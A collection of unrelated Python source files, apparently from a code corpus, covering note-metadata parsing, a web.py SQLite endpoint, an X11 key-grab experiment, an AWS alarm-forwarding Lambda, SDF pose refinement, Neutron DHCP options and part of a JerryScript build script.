            if k in ["created", "last_modified"]:
                # Timestamps are rendered in the caller-supplied timezone.
                v = str(v.astimezone(timezone))
            v = str(v)
            note_header[k] = v
        return super()._note_to_html(note_header=note_header, note_html=note.html)
    @classmethod
    def get_stored_note_metadata(
        cls, notes_dir, note_path: Path
    ) -> Tuple[OneNotePageId, OneNotePageMetadata]:
        """Reconstruct a page's id and metadata from its stored file.

        Raises CorruptedNoteError when the directory layout (must be
        exactly two levels below notes_dir) or the parsed note header is
        not in the expected shape.
        """
        dir_parts = note_path.relative_to(notes_dir).parents[0].parts
        if 2 != len(dir_parts):
            raise CorruptedNoteError(
                "Note's dir depth is expected to be exactly 2 levels", note_path
            )
        file = note_path.name
        header_vars = cls._parse_note_header(note_path)
        try:
            name = (
                # fmt: off
                tuple(denormalize_filename(d) for d in dir_parts)
                + (header_vars["title"],)
                # fmt: on
            )
            note_metadata = OneNotePageMetadata(
                dir=dir_parts,
                name=name,
                last_modified=cls._parse_datetime(header_vars["last_modified"]),
                file=file,
            )
            return header_vars["id"], note_metadata
        except (KeyError, ValueError) as e:
            # Missing header keys / bad datetimes surface as corruption.
            raise CorruptedNoteError(
                "Unable to retrieve note metadata: %s" % repr(e), note_path
            )
    @classmethod
    def _parse_datetime(cls, dt: str) -> datetime.datetime:
        """Parse a datetime string, rejecting timezone-naive values."""
        parsed_dt = dateutil.parser.parse(dt)
        if not parsed_dt.tzinfo:
            raise ValueError("Expected tz-aware datetime, received '%s'" % dt)
        return parsed_dt
|
"""
Outras linguagens de programação:
Public, Private, Protected
-Public: Consegue acessar o atributo ou método dentro ou fora da classe
+Private: Consegue acessar o atributo ou método apenas dentro da classe
#Protected: Consegue acessar o atributo ou método apenas dentro da classe ou dentro das classes filhas da classe
No python, esses conceitos não existem exatamente desta maneira
O que existe mais são convenções onde os programadores entendem que podem ou não usar algo
_NOMEATRIBUTO Simboliza que o atributo ou método não deve ser acessado ou modificado fora da classe
__NOMEATRIBUTO Simboliza FORTEMENTE que o atributo ou método não deve ser acessado ou modificado fora da classe
Neste ultimo caso, o simbolismo é tamanho que para conseguir se acessar tal atributo ou método, é necessário usar: instancia._NOMECLASSE__nomeatributo/metodo
Ex: p1._Pessoa__nome
"""
class Carro:
    """Tiny in-memory registry of cars keyed by id.

    Data layout is kept as the original: {'carros': {id: nome}}.
    """

    def __init__(self):
        self.lista_carros = {}

    def inserir_carro(self, id, nome):
        """Add (or replace) the car registered under ``id``."""
        # setdefault replaces the original if/else key-existence dance.
        self.lista_carros.setdefault('carros', {})[id] = nome

    def remover_carro(self, id):
        """Remove the car with ``id``; silently ignore unknown ids.

        BUGFIX: the original raised KeyError both when 'carros' had never
        been created and when the id was absent.
        """
        self.lista_carros.get('carros', {}).pop(id, None)

    def mostrar_carros(self):
        """Print every registered car, one per line."""
        for id, nome in self.lista_carros.get('carros', {}).items():
            print(id, nome)
# Things work, but something dangerous can still happen (see next example).
c1 = Carro()
for car_id, car_name in ((1, 'Corsa'), (2, 'Mustang'), (3, 'Camaro')):
    c1.inserir_carro(car_id, car_name)
c1.remover_carro(1)
c1.mostrar_carros()
|
from vip_provider.credentials.base import CredentialBase, CredentialAdd
class CredentialNetworkAPI(CredentialBase):
    """NetworkAPI credential reader; all behavior comes from CredentialBase."""
    pass
class CredentialAddNetworkAPI(CredentialAdd):
    """Credential writer for the NetworkAPI VIP provider."""
    def valid_fields(self):
        # Whitelist of keys accepted when storing a NetworkAPI credential.
        return [
            'user', 'password', 'endpoint', 'business', 'cache_group',
            'destination', 'env_pool_id', 'env_vip_id', 'finality',
            'healthcheck_expect', 'healthcheck_request', 'healthcheck_type',
            'id_equipment_type', 'id_group', 'id_model', 'l4_protocol',
            'l7_protocol', 'l7_rule', 'lb_method', 'limit', 'member_status',
            'persistence', 'priority', 'servicedownaction', 'timeout',
            'traffic_return', 'vm_name', 'weight'
        ]
|
import web
import sqlite3
import jsonpickle
# web.py route table: map /users to the `users` handler class below.
urls = ('/users', 'users')
class users:
    """web.py handler that lists every row of the ``dosuser`` table."""

    def GET(self):
        """Return all dosuser rows serialized as a JSON array.

        BUGFIX: the original opened a second connection
        (``sqlite3.connect("DOSDATA.sqlite", check_same_thread=False)``)
        whose handle was discarded and leaked, and never closed the
        working connection on error.
        """
        connection = sqlite3.connect('DOSDATA.sqlite')
        try:
            cursor = connection.cursor()
            sql_query = "SELECT * FROM dosuser"
            rows = cursor.execute(sql_query)
            jsonobjectRows = []
            for row in rows:
                jsonobject = {
                    'name': row[0],
                    'Title': row[1],
                    'Email': row[2],
                    'Phone': row[3],
                    'Location': row[4],
                    'Topic': row[5],
                }
                jsonobjectRows.append(jsonobject)
        finally:
            # Close the connection even when the query raises.
            connection.close()
        return jsonpickle.encode(jsonobjectRows)
app = web.application(urls, globals())
if __name__ == '__main__':
    # Serve on all interfaces, port 7744.
    # NOTE(review): runsimple() blocks, so the app.run() below is only
    # reached after the first server stops — confirm both are intended.
    web.httpserver.runsimple(app.wsgifunc(), ("0.0.0.0", 7744))
    app.run()
|
from os import urandom, environ
# S3 upload configuration; credentials come from the environment.
S3_BUCKET_NAME = "wedding-app-images"
S3_ACCESS_KEY_ID = environ.get('S3_ACCESS_KEY_ID')
S3_ACCESS_SECRET_KEY = environ.get('S3_ACCESS_SECRET_KEY')
S3_LOCATION = 'https://{}.s3-sa-east-1.amazonaws.com/'.format(S3_BUCKET_NAME)
# NOTE(review): regenerated on every process start, invalidating existing
# sessions across restarts/workers — confirm this is intended.
SECRET_KEY = urandom(32)
DEBUG = True
API_ADDRESS = "https://enigmatic-mountain-68956.herokuapp.com"
PORT = 5000
|
# coding=utf-8
# Experiment: synchronously grab two X keycodes (10 and 15) and decide per
# event whether to swallow them or replay them to other clients.
import signal
from Xlib.display import Display
from Xlib import X
display = Display()
root = display.screen().root
# Parity toggle: alternates swallow/replay for keycode 10 (see loop below).
counter = 0
def swallow_keystroke(event):
    """Consume the grabbed key event (AsyncKeyboard resumes processing
    without replaying the key to other clients)."""
    print("s")
    display.allow_events(X.AsyncKeyboard, event.time)
def passthru_keystroke(event):
    """Replay the grabbed key event so other clients receive it."""
    print("p")
    display.allow_events(X.ReplayKeyboard, event.time)
display.flush()
# Passive synchronous grabs: the server freezes keyboard event delivery on
# keycodes 15 and 10 until we call allow_events for each event.
root.grab_key(15, 0, True, X.GrabModeSync, X.GrabModeSync)
root.grab_key(10, 0, True, X.GrabModeSync, X.GrabModeSync)
# Watchdog: no SIGALRM handler is installed, so the default disposition
# terminates the process after 10 s if the loop never exits.
signal.alarm(10)
while True:
    print("event...")
    event = display.next_event()
    print(event.type, event.detail, event.time)
    # Keycode 10: alternate swallow/replay based on `counter` parity.
    if event.type == X.KeyPress and event.detail == 10:
        print("pressed")
        if not counter % 2:
            swallow_keystroke(event)
        else:
            passthru_keystroke(event)
    elif event.type == X.KeyRelease and event.detail == 10:
        print("released")
        if not counter % 2:
            swallow_keystroke(event)
        else:
            passthru_keystroke(event)
        # Parity flips only on release, so press/release of one stroke
        # get the same treatment.
        counter += 1
    # Keycode 15: always swallow the press; release ends the program.
    if event.type == X.KeyPress and event.detail == 15:
        swallow_keystroke(event)
    if event.type == X.KeyRelease and event.detail == 15:
        print("exit")
        break
root.ungrab_key(10, 0)
root.ungrab_key(15, 0)
display.close()
|
import boto3
import botocore
import json
import logging
import os
from botocore.exceptions import ClientError
region = os.environ["AWS_REGION"]
# Environments whose alerts go to the primary Slack events channel.
events_channel = os.environ["EVENTS_CHANNEL"].split(",")
logger = logging.getLogger()
#logger.setLevel(logging.INFO)
# NOTE: these SSM lookups run at import time (Lambda cold start), not per
# invocation; a failure here prevents the handler from loading.
ssm = boto3.client("ssm", region_name=region)
slack_events_param = ssm.get_parameter(
    Name=f'/account/{region}/alert/sns/arn_slack_events',
    WithDecryption=False
)
slack_other_events_param = ssm.get_parameter(
    Name=f'/account/{region}/alert/sns/arn_slack_otherevents',
    WithDecryption=False
)
slack_events_topic = slack_events_param["Parameter"]["Value"]
slack_other_events_topic = slack_other_events_param["Parameter"]["Value"]
def get_sns_client():
    """Return an SNS client bound to the configured region."""
    return boto3.client("sns", region_name=region)
def send_sns_message(sns_topic_arn, sns_message):
    """Publish ``sns_message`` to ``sns_topic_arn``.

    Returns the SNS publish response dict, or None when publishing failed
    (the error is logged). BUGFIX: the original discarded the response,
    so lambda_handler always logged ``null``.
    """
    sns = get_sns_client()
    try:
        response = sns.publish(
            TargetArn=sns_topic_arn,
            Message=sns_message)
    except botocore.exceptions.ClientError as error:
        logger.exception(error)
        return None
    return response
def get_message(record):
    """Decode the JSON ``Message`` payload of one SNS record."""
    return json.loads(record["Sns"]["Message"])
def get_subject(record):
    """Return the ``Subject`` field of one SNS record."""
    return record["Sns"]["Subject"]
def parse_record(record):
    """Flatten the interesting fields of an ASG SNS record into a dict."""
    message = get_message(record)
    details = message["Details"]
    alarm = details["InvokingAlarms"][0]
    parsed_message = {
        "cause": message["Cause"],
        "asg_name": message["AutoScalingGroupName"],
    }
    # The environment is encoded as the first dash-separated token of the
    # auto-scaling-group name.
    parsed_message["environment"] = parsed_message["asg_name"].split("-")[0]
    parsed_message["alarm_name"] = alarm["AlarmName"]
    parsed_message["metric_name"] = alarm["Trigger"]["MetricName"]
    return parsed_message
def get_sns_topic(environment):
    """Map an environment name to its Slack SNS topic ARN."""
    if environment in events_channel:
        return slack_events_topic
    return slack_other_events_topic
def lambda_handler(event, context):
    """Forward ASG CPUUtilization alarm records to the right Slack topic.

    Non-CPUUtilization records are logged as warnings and skipped.
    """
    for index, record in enumerate(event["Records"]):
        logger.info(json.dumps(record))
        subject = get_subject(record)
        message_details = parse_record(record)
        if message_details["metric_name"] == "CPUUtilization":
            # Deep links into the AWS console for the ASG and the alarm.
            console_url = f'https://{region}.console.aws.amazon.com/ec2autoscaling/home?region={region}#/details/{message_details["asg_name"]}?view=activity'
            alarm_url = f'https://{region}.console.aws.amazon.com/cloudwatch/home?region={region}#alarmsV2:alarm/{message_details["alarm_name"]}'
            sns_message = f'*Subject: {subject}*\n*Message:* {message_details["cause"]}\n*ASG Console url:* {console_url}\n*CW Alarm url:* {alarm_url}\n*EOM*'
            sns_topic_arn = get_sns_topic(message_details["environment"])
            response = send_sns_message(
                sns_topic_arn = sns_topic_arn,
                sns_message = sns_message)
            logger.info(f"Processed record {index} succesfully")
            # Logs whatever send_sns_message returned (may be None).
            logger.info(json.dumps(response))
        else:
            log_message = f'Launch event was not for CPUUtilization. Record:{json.dumps(record)}'
            logger.warning(log_message)
    return {
        "status": "Complete"
    }
# Copyright (c) 2020 NVIDIA Corporation. All rights reserved.
# This work is licensed under the NVIDIA Source Code License - Non-commercial. Full
# text can be found in LICENSE.md
from sdf_optimizer import *
from transforms3d.quaternions import mat2quat, quat2mat
import cv2
def Twc_np(pose):
    """Build a 4x4 homogeneous transform from a [t(3), quat(4)] pose."""
    Twc = np.eye(4, dtype=np.float32)
    Twc[:3, :3] = quat2mat(pose[3:])
    Twc[:3, 3] = pose[:3]
    return Twc
# Python 2/3 compatibility shims for pickle and lock-step iteration.
try:
    import cPickle as pickle  # Python 2
except ImportError:
    import pickle
import numpy as np
try:
    from itertools import izip_longest as izip  # Python 2
except ImportError:
    # BUGFIX: izip_longest does not exist on Python 3; it is zip_longest,
    # so the original import crashed the module under Python 3.
    from itertools import zip_longest as izip
class SignedDensityField(object):
    """Dense signed-distance voxel grid.

    Data is stored in the following way
        data[x, y, z]
    ``origin`` is the world position of voxel (0, 0, 0) and ``delta`` the
    (uniform) voxel size.
    """

    def __init__(self, data, origin, delta):
        self.data = data
        self.nx, self.ny, self.nz = data.shape
        self.origin = origin
        self.delta = delta
        self.max_coords = self.origin + delta * np.array(data.shape)

    def _rel_pos_to_idxes(self, rel_pos):
        """Map (N, 3) world positions to voxel indices, clipped in-grid."""
        # BUGFIX: np.int was removed in NumPy 1.24; the builtin int is the
        # documented replacement.
        i_min = np.array([0, 0, 0], dtype=int)
        i_max = np.array([self.nx - 1, self.ny - 1, self.nz - 1], dtype=int)
        return np.clip(((rel_pos - self.origin) / self.delta).astype(int), i_min, i_max)

    def get_distance(self, rel_pos):
        """Nearest-voxel signed distance for each of the (N, 3) positions."""
        idxes = self._rel_pos_to_idxes(rel_pos)
        assert idxes.shape[0] == rel_pos.shape[0]
        return self.data[idxes[:, 0], idxes[:, 1], idxes[:, 2]]

    def dump(self, pkl_file):
        """Pickle the grid (protocol 2 for Python-2 readability)."""
        data = {}
        data['data'] = self.data
        data['origin'] = self.origin
        data['delta'] = self.delta
        # BUGFIX: use a with-statement; the original leaked the handle.
        with open(pkl_file, "wb") as f:
            pickle.dump(data, f, protocol=2)

    def visualize(self, max_dist=0.1):
        """Render the field as a mayavi volume, if mayavi is installed."""
        try:
            from mayavi import mlab
        except ImportError:
            # BUGFIX: the original printed and fell through, then crashed
            # on the undefined `mlab`; bail out instead.
            print("mayavi is not installed!")
            return
        figure = mlab.figure('Signed Density Field')
        SCALE = 100  # The dimensions will be expressed in cm for better visualization.
        data = np.copy(self.data)
        data = np.minimum(max_dist, data)
        xmin, ymin, zmin = SCALE * self.origin
        xmax, ymax, zmax = SCALE * self.max_coords
        delta = SCALE * self.delta
        xi, yi, zi = np.mgrid[xmin:xmax:delta, ymin:ymax:delta, zmin:zmax:delta]
        data[data <= 0] -= 0.2
        data = -data
        grid = mlab.pipeline.scalar_field(xi, yi, zi, data)
        vmin = np.min(data)
        vmax = np.max(data)
        mlab.pipeline.volume(grid, vmin=vmin, vmax=(vmax + vmin) / 2)
        mlab.axes()
        mlab.show()

    @classmethod
    def from_sdf(cls, sdf_file):
        """Parse a text .sdf file: dims, origin, delta header + values."""
        with open(sdf_file, "r") as file:
            lines = file.readlines()
        nx, ny, nz = map(int, lines[0].split(' '))
        print(nx, ny, nz)
        x0, y0, z0 = map(float, lines[1].split(' '))
        print(x0, y0, z0)
        delta = float(lines[2].strip())
        print(delta)
        data = np.zeros([nx, ny, nz])
        # Values are listed x-fastest, then y, then z.
        for i, line in enumerate(lines[3:]):
            idx = i % nx
            idy = int(i / nx) % ny
            idz = int(i / (nx * ny))
            val = float(line.strip())
            data[idx, idy, idz] = val
        return cls(data, np.array([x0, y0, z0]), delta)

    @classmethod
    def from_pkl(cls, pkl_file):
        """Load a grid written by dump().

        BUGFIX: the original opened the pickle in text mode ("r"), which
        fails on the binary protocol-2 stream; it must be "rb".
        """
        with open(pkl_file, "rb") as f:
            data = pickle.load(f)
        return cls(data['data'], data['origin'], data['delta'])
if __name__ == '__main__':
    # Demo: perturb a known object pose and recover it by SDF-based
    # pose refinement, then plot ground-truth/initial/optimized points.
    # object_name = '002_master_chef_can'
    # object_name = '037_scissors'
    # object_name = '061_foam_brick'
    object_name = '007_tuna_fish_can'
    visualize_sdf = False
    sdf_file = '../../data/YCB_Object/models/{}/textured_simple_low_res.pth'.format(object_name)
    sdf_optim = sdf_optimizer(sdf_file, lr=0.01, use_gpu=True, optimizer='Adam')
    print(torch.max(sdf_optim.sdf_torch))
    print(torch.min(sdf_optim.sdf_torch))
    if visualize_sdf:
        sdf_show = SignedDensityField.from_sdf(sdf_file)
        sdf_show.visualize()
    # load points of the same object
    point_file = '../../data/YCB_Object/models/{}/points.xyz'.format(object_name)
    points = torch.from_numpy(np.loadtxt(point_file)).float()
    # Homogeneous coordinates: append a column of ones.
    points = torch.cat((points, torch.ones((points.size(0), 1), dtype=torch.float32)), dim=1)
    points_np = points.numpy()
    print(points_np.shape)
    # set ground truth pose
    pose_gt = np.zeros((7,), dtype=np.float32)
    pose_gt[:3] = np.array([1, 1, 1], dtype=np.float32)
    R = np.array([[-1, 0, 0],
                  [0, np.sqrt(0.5), -np.sqrt(0.5)],
                  [0, -np.sqrt(0.5), -np.sqrt(0.5)]], dtype=np.float32)
    pose_gt[3:] = mat2quat(R)
    # get measurements
    Twc_gt = Twc_np(pose_gt)
    # Transform object points into the camera frame and subsample 2000.
    points_c = np.matmul(np.linalg.inv(Twc_gt), np.transpose(points_np)).transpose()
    points_c = torch.from_numpy(points_c)
    index = np.random.permutation(np.arange(points_c.shape[0]))[:2000]
    points_c = points_c[index, :]
    print(points_c.shape)
    # Perturb the initial guess: random rotation up to ~40 deg plus a
    # small translation offset.
    T_co_init = np.linalg.inv(Twc_gt)
    R_perturb = axangle2mat(np.random.rand(3,), 40 * np.random.rand() / 57.3, is_normalized=False)
    T_co_init[:3, :3] = np.matmul(T_co_init[:3, :3], R_perturb)
    T_co_init[:3, 3] += 0.01
    points_init = np.matmul(np.linalg.inv(T_co_init), points_c.numpy().transpose()).transpose()
    # optimization
    points_input = points_c[:, :3].clone().cuda()
    T_co_opt, sdf_values = sdf_optim.refine_pose_layer(T_co_init, points_input, steps=100)
    print(T_co_opt)
    print(np.linalg.inv(Twc_gt))
    np.set_printoptions(threshold=sys.maxsize)
    # print(sdf_values.detach().cpu().numpy())
    # visualization for debugging
    points_opt = np.matmul(np.linalg.inv(T_co_opt), points_c.numpy().transpose()).transpose()
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(points_np[::5, 0], points_np[::5, 1], points_np[::5, 2], color='green')
    ax.scatter(points_init[::5, 0], points_init[::5, 1], points_init[::5, 2], color='red')
    ax.scatter(points_opt[::5, 0], points_opt[::5, 1], points_opt[::5, 2], color='blue')
    ax.set_xlabel('X Label')
    ax.set_ylabel('Y Label')
    ax.set_zlabel('Z Label')
    # Use a cubic bounding box so the three clouds share one scale.
    min_coor = np.min(np.array([sdf_optim.xmin, sdf_optim.ymin, sdf_optim.zmin]))
    max_coor = np.max(np.array([sdf_optim.xmax, sdf_optim.ymax, sdf_optim.zmax]))
    ax.set_xlim(min_coor, max_coor)
    ax.set_ylim(min_coor, max_coor)
    ax.set_zlim(min_coor, max_coor)
    plt.show()
|
def target_game(values):
|
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import extra_dhcp_opt as edo_ext
from neutron_lib.api.definitions import port as port_def
from neutron.db import _resource_extend as resource_extend
from neutron.db import api as db_api
from neutron.objects.port.extensions import extra_dhcp_opt as obj_extra_dhcp
@resource_extend.has_resource_extenders
class ExtraDhcpOptMixin(object):
    """Mixin class to add extra options to the DHCP opts file
    and associate them to a port.
    """

    def _is_valid_opt_value(self, opt_name, opt_value):
        """Return True when opt_value should be persisted for opt_name."""
        # If the dhcp opt is blank-able, it shouldn't be saved to the DB in
        # case that the value is None
        if opt_name in edo_ext.VALID_BLANK_EXTRA_DHCP_OPTS:
            return opt_value is not None
        # Otherwise, it shouldn't be saved to the DB in case that the value
        # is None or empty
        return bool(opt_value)

    def _process_port_create_extra_dhcp_opts(self, context, port,
                                             extra_dhcp_opts):
        """Persist extra DHCP opts of a newly created port.

        Returns the (extended) port dict in both branches. BUGFIX: the
        original returned the result of the extender, which was None, so
        callers got port when no opts were given and None otherwise.
        """
        if not extra_dhcp_opts:
            return port
        with db_api.context_manager.writer.using(context):
            for dopt in extra_dhcp_opts:
                if self._is_valid_opt_value(dopt['opt_name'],
                                            dopt['opt_value']):
                    ip_version = dopt.get('ip_version', 4)
                    extra_dhcp_obj = obj_extra_dhcp.ExtraDhcpOpt(
                        context,
                        port_id=port['id'],
                        opt_name=dopt['opt_name'],
                        opt_value=dopt['opt_value'],
                        ip_version=ip_version)
                    extra_dhcp_obj.create()
        return self._extend_port_extra_dhcp_opts_dict(context, port)

    def _extend_port_extra_dhcp_opts_dict(self, context, port):
        """Attach the stored extra DHCP opts to the port dict; return it."""
        port[edo_ext.EXTRADHCPOPTS] = self._get_port_extra_dhcp_opts_binding(
            context, port['id'])
        return port

    def _get_port_extra_dhcp_opts_binding(self, context, port_id):
        """Return the port's extra DHCP opts as a list of plain dicts."""
        opts = obj_extra_dhcp.ExtraDhcpOpt.get_objects(
            context, port_id=port_id)
        # TODO(mhickey): When port serilization is available then
        # the object list should be returned instead
        return [{'opt_name': r.opt_name, 'opt_value': r.opt_value,
                 'ip_version': r.ip_version}
                for r in opts]

    def _update_extra_dhcp_opts_on_port(self, context, id, port,
                                        updated_port=None):
        """Create/update/delete a port's extra DHCP opts from a request.

        An opt_value of None in the request deletes the matching stored
        option. Returns True when the request carried any opts.
        """
        # It is not necessary to update in a transaction, because
        # its called from within one from ovs_neutron_plugin.
        dopts = port['port'].get(edo_ext.EXTRADHCPOPTS)
        if dopts:
            opts = obj_extra_dhcp.ExtraDhcpOpt.get_objects(
                context, port_id=id)
            # if there are currently no dhcp_options associated to
            # this port, Then just insert the new ones and be done.
            with db_api.context_manager.writer.using(context):
                for upd_rec in dopts:
                    # Match an existing opt by (name, ip_version); the
                    # for/else falls through to creation when none match.
                    for opt in opts:
                        if (opt['opt_name'] == upd_rec['opt_name']
                                and opt['ip_version'] == upd_rec.get(
                                    'ip_version', 4)):
                            # to handle deleting of a opt from the port.
                            if upd_rec['opt_value'] is None:
                                opt.delete()
                            else:
                                if (self._is_valid_opt_value(
                                        opt['opt_name'],
                                        upd_rec['opt_value']) and
                                        opt['opt_value'] !=
                                        upd_rec['opt_value']):
                                    opt['opt_value'] = upd_rec['opt_value']
                                    opt.update()
                            break
                    else:
                        if self._is_valid_opt_value(
                                upd_rec['opt_name'],
                                upd_rec['opt_value']):
                            ip_version = upd_rec.get('ip_version', 4)
                            extra_dhcp_obj = obj_extra_dhcp.ExtraDhcpOpt(
                                context,
                                port_id=id,
                                opt_name=upd_rec['opt_name'],
                                opt_value=upd_rec['opt_value'],
                                ip_version=ip_version)
                            extra_dhcp_obj.create()
            if updated_port:
                edolist = self._get_port_extra_dhcp_opts_binding(context, id)
                updated_port[edo_ext.EXTRADHCPOPTS] = edolist
        return bool(dopts)

    @staticmethod
    @resource_extend.extends([port_def.COLLECTION_NAME])
    def _extend_port_dict_extra_dhcp_opt(res, port):
        """Resource extender: copy a port DB object's opts into its dict."""
        res[edo_ext.EXTRADHCPOPTS] = [{'opt_name': dho.opt_name,
                                       'opt_value': dho.opt_value,
                                       'ip_version': dho.ip_version}
                                      for dho in port.dhcp_opts]
        return res
|
from kubernetes import client
def request(func, *args, catch=False, **kwargs):
    """Invoke ``func(*args, **kwargs)`` and report success as a tuple.

    Returns (True, result); with catch=True a kubernetes ApiException is
    trapped and (False, exception) is returned instead of raising.
    """
    if not catch:
        return True, func(*args, **kwargs)
    try:
        return True, func(*args, **kwargs)
    except client.rest.ApiException as err:
        return False, err
|
#!/usr/bin/env python
import json
import os
import shutil
# EXTRACT
################################################################################
EXPORTED_DIRNAME = 'Exported'
EXTRACT_DIRNAME = 'Courses'
FILES_TO_SKIP = ['.DS_Store', 'Thumbs.db', 'ehthumbs.db', 'ehthumbs_vista.db', '.gitkeep']


def extract_courses():
    """
    Extract all the `.gz`s from `chefdata/Exported/{course_name}.gz`
    to `chefdata/Courses/{course_name}/course`.
    Returns course_names = list of course names encountered.
    """
    course_names = []
    # src
    srcdir = os.path.join('chefdata', EXPORTED_DIRNAME)
    # dest
    extractdir = os.path.join('chefdata', EXTRACT_DIRNAME)
    for filename in os.listdir(srcdir):
        if not filename.endswith('.gz'):
            print('skipping non-gz file', filename)
            continue
        gzpath = os.path.join(srcdir, filename)
        # Strip '.tar.gz' before '.gz' so 'x.tar.gz' -> 'x', not 'x.tar'.
        if filename.endswith('.tar.gz'):
            course_name = filename[:-len('.tar.gz')]
        else:
            course_name = filename[:-len('.gz')]
        destdir = os.path.join(extractdir, course_name)
        if not os.path.exists(destdir):
            print('Untargzipping course', course_name, 'from', gzpath, 'to', destdir)
            shutil.unpack_archive(gzpath, destdir, 'gztar')
        # BUGFIX: previously a course was appended only when freshly
        # extracted, so re-runs silently dropped already-extracted
        # courses from the returned listing.
        course_names.append(course_name)
    return course_names
def extract():
    """
    Call extract_courses to untargz
    Exported/{course_name}.tar.gz --> Courses/{course_name}/course
    and list of courses in `course_list.json` for later processing.
    """
    course_names = extract_courses()
    print('\textracting course_names', course_names)
    lang = 'ar'
    course_list = {
        # NOTE: the original called .format(lang) on this placeholder-free
        # string — a no-op, removed; the literal is unchanged.
        "title": "Edraak Continuing Education",
        "kind": "edX course listing",
        "courses": []
    }
    for course_name in course_names:
        print('\tCourse course_name=', course_name)
        course_info = {
            "name": course_name,
            "path": os.path.join('chefdata', EXTRACT_DIRNAME, course_name),
            "lang": lang,
        }
        course_list['courses'].append(course_info)
    containerdir = os.path.join('chefdata', EXTRACT_DIRNAME)
    # Local names fixed from the original's 'couse_*' typos.
    course_list_path = os.path.join(containerdir, 'course_list.json')
    with open(course_list_path, 'w') as course_list_file:
        json.dump(course_list, course_list_file, indent=4, ensure_ascii=False)
# CLI
################################################################################
if __name__ == '__main__':
    # Script entry point: extract every exported course archive.
    extract()
|
#!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import multiprocessing
import os
import shutil
import subprocess
import sys
import settings
# Default CMake output directory and ECMAScript profile for the build.
BUILD_DIR = os.path.join(settings.PROJECT_DIR, 'build')
DEFAULT_PROFILE = 'es5.1'
def default_toolchain():
    """Return the CMake toolchain file matching the host OS/arch, or None."""
    sysname, _, _, _, machine = os.uname()
    filename = 'toolchain_%s_%s.cmake' % (sysname.lower(), machine.lower())
    toolchain = os.path.join(settings.PROJECT_DIR, 'cmake', filename)
    return toolchain if os.path.isfile(toolchain) else None
def get_arguments():
    """Parse the build-script command line.

    A pre-parser first detects --devhelp so that developer-only options
    can either be shown or collapsed to argparse.SUPPRESS; the real
    parser then consumes the remaining arguments.
    """
    devhelp_preparser = argparse.ArgumentParser(add_help=False)
    devhelp_preparser.add_argument('--devhelp', action='store_true', default=False,
                                   help='show help with all options '
                                        '(including those, which are useful for developers only)')
    devhelp_arguments, args = devhelp_preparser.parse_known_args()
    if devhelp_arguments.devhelp:
        args.append('--devhelp')
    def devhelp(helpstring):
        # Hide developer help strings unless --devhelp was given.
        return helpstring if devhelp_arguments.devhelp else argparse.SUPPRESS
    parser = argparse.ArgumentParser(parents=[devhelp_preparser])
    parser.add_argument('--all-in-one', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='all-in-one build (%(choices)s; default: %(default)s)')
    parser.add_argument('--builddir', metavar='DIR', action='store', default=BUILD_DIR,
                        help='specify output directory (default: %(default)s)')
    parser.add_argument('--clean', action='store_true', default=False, help='clean build')
    parser.add_argument('--cmake-param', metavar='OPT', action='append', default=[],
                        help='add custom argument to CMake')
    parser.add_argument('--compile-flag', metavar='OPT', action='append', default=[],
                        help='add custom compile flag')
    parser.add_argument('--cpointer-32bit', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable 32 bit compressed pointers (%(choices)s; default: %(default)s)')
    parser.add_argument('--debug', action='store_const', const='Debug', default='MinSizeRel', dest='build_type',
                        help='debug build')
    parser.add_argument('--doctests', action='store_const', const='ON', default='OFF',
                        help='build doctests')
    parser.add_argument('--error-messages', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable error messages (%(choices)s; default: %(default)s)')
    parser.add_argument('--external-context', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable external context (%(choices)s; default: %(default)s)')
    parser.add_argument('-j', '--jobs', metavar='N', action='store', type=int, default=multiprocessing.cpu_count() + 1,
                        help='Allowed N build jobs at once (default: %(default)s)')
    parser.add_argument('--jerry-cmdline', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='build jerry command line tool (%(choices)s; default: %(default)s)')
    parser.add_argument('--jerry-cmdline-snapshot', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='build snapshot command line tool (%(choices)s; default: %(default)s)')
    parser.add_argument('--jerry-debugger', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable the jerry debugger (%(choices)s; default: %(default)s)')
    parser.add_argument('--jerry-ext', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='build jerry-ext (default: %(default)s)')
    parser.add_argument('--jerry-libc', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='build and use jerry-libc (%(choices)s; default: %(default)s)')
    parser.add_argument('--jerry-libm', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='build and use jerry-libm (%(choices)s; default: %(default)s)')
    parser.add_argument('--jerry-port-default', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='build default jerry port implementation (%(choices)s; default: %(default)s)')
    parser.add_argument('--js-parser', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='enable js-parser (%(choices)s; default: %(default)s)')
    parser.add_argument('--link-lib', metavar='OPT', action='append', default=[],
                        help='add custom library to be linked')
    parser.add_argument('--linker-flag', metavar='OPT', action='append', default=[],
                        help='add custom linker flag')
    parser.add_argument('--lto', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='enable link-time optimizations (%(choices)s; default: %(default)s)')
